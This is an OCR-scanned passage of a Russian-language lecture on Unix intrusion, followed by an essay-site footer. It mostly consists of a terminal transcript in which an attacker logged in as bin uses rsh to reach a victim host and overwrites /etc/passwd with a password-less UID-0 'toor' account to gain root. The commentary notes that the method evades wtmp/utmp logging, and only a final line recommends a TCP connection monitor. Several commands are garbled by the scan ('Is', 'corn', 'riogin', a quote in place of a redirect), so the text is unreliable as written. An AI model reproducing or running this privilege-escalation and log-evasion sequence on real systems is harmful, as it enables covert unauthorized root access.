Лекция: Сценарию 4.

Проникновение в систему с помощью rsh

Поскольку специальный пользователь bin, как правило, имеет доступ к

Ключевым файлам и каталогам, то, зарегистрировавшись как bin, может

Изменить файл паролей так, чтобы получить привилегии доступа root.

Например:

evil % whoami

Bin

evil % rsh victim, corn csh -i

Warning: no access to tty; thus no job control in this shell.. .

victim % Is -ldg /etc

drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc

victim % cd /etc

victim % mv passwd pw.old

victim % (echo toor:: 0:1: суперпользователь без пароля :/:/bin/sh; cat

pw.old ) " passwd

victim % `D

evil % riogin victim, corn -I toor Welcome to victim, corn!

victim #

Несколько замечаний no поводу деталей приведенного выше метода: «rsh

victim.com csh -i» используется для проникновения в систему, так как при

Таком запуске csh не оставляет никаких следов в файлах учета wtmp или

Utmp, делая rsh невидимым для finger или who. Правда, при этом удаленный

Командный процессор не подключается к псевдотерминалу, и полноэкранные

Программы (например, редакторы) работать не будут. На многих системах

Атака с помощью rsh (в случае успешного завершения) оставалась абсолютно

Незамеченной, поэтому мы рекомендуем использовать анализатор внешних

Tcp-нодключений, который поможет обнаружить такую деятельность.

еще рефераты
Еще работы по информатике